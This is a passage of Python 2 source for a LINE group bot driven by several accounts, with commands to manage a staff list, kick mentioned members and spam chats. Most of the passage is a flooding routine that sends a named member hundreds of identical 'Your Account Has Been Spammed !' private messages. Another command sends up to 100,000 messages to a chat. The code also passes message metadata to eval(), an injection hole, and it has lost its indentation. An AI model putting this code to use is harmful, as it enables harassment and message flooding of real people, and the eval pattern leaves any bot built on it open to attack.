targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admsa:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = ki2.getGroup(msg.to)
gs = ki3.getGroup(msg.to)
gs = ki4.getGroup(msg.to)
gs = ki5.getGroup(msg.to)
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","stafflist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list:")
mc = ""
for mi_d in staff:
mc += "=>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
elif ("Vk " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Contact " in msg.text):
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendText(msg.to,"Mid:" + key1)
#----------------------------------------------------------------
elif "InviteMeTo: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("InviteMeTo: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
ki.findAndAddContactsByMid(msg.from_)
ki.inviteIntoGroup(gid,[msg.from_])
except:
ki.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#-----------------------------------------------------------
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
#Vicky Kull~
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif "Cek pm @" in msg.text:
_name = msg.text.replace("Cek pm @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
ki7.sendText(g.mid,"Your Account Has Been Spammed !")
ki.sendText(g.mid,"Your Account Has Been Spammed !")
ki2.sendText(g.mid,"Your Account Has Been Spammed !")
ki3.sendText(g.mid,"Your Account Has Been Spammed !")
ki4.sendText(g.mid,"Your Account Has Been Spammed !")
ki5.sendText(g.mid,"Your Account Has Been Spammed !")
ki6.sendText(g.mid,"Your Account Has Been Spammed !")
